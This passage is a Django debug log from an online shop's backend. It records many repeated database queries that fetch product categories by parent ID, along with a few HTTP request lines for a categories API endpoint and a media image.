"shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 13:32:29,513 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 13:32:29,517 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 13:32:29,521 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 13:32:29,526 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 13:32:29,530 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 13:32:29,534 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 13:32:29,540 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 13:32:29,545 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 13:32:29,550 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 13:32:29,554 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 13:32:29,558 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 13:32:29,562 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 13:32:29,566 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 13:32:29,571 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 13:32:29,575 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 13:32:29,579 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 13:32:29,583 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 13:32:29,587 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 13:32:29,591 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 13:32:29,595 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 13:32:29,599 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 13:32:29,603 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 13:32:29,608 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 13:32:29,612 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 13:32:29] "GET /api/v1/categories/ HTTP/1.0" 200 8596 [13/Dec/2019 13:32:30] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 304 0 DEBUG 2019-12-13 13:34:10,550 utils 11259 139831552767744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:34:10,562 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 13:34:10,567 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 13:34:10,571 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 13:34:10,576 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 13:34:10,581 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 13:34:10,585 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 13:34:10,590 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 13:34:10,594 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 13:34:10,598 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 13:34:10,602 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 13:34:10,606 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 13:34:10,610 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 13:34:10,614 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 13:34:10,619 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 13:34:10,623 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 13:34:10,627 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 13:34:10,631 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 13:34:10,636 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 13:34:10,641 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 13:34:10,646 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 13:34:10,651 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 13:34:10,655 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 13:34:10,660 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 13:34:10,664 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 13:34:10,668 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 13:34:10,672 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 13:34:10,675 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 13:34:10,677 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 13:34:10,681 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 13:34:10,685 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 13:34:10,687 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 13:34:10,690 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 13:34:10,692 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 13:34:10,695 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 13:34:10,698 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 13:34:10,701 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 13:34:10,705 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 13:34:10,709 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 13:34:10,711 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 13:34:10,714 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 13:34:10,716 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 13:34:10,719 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", 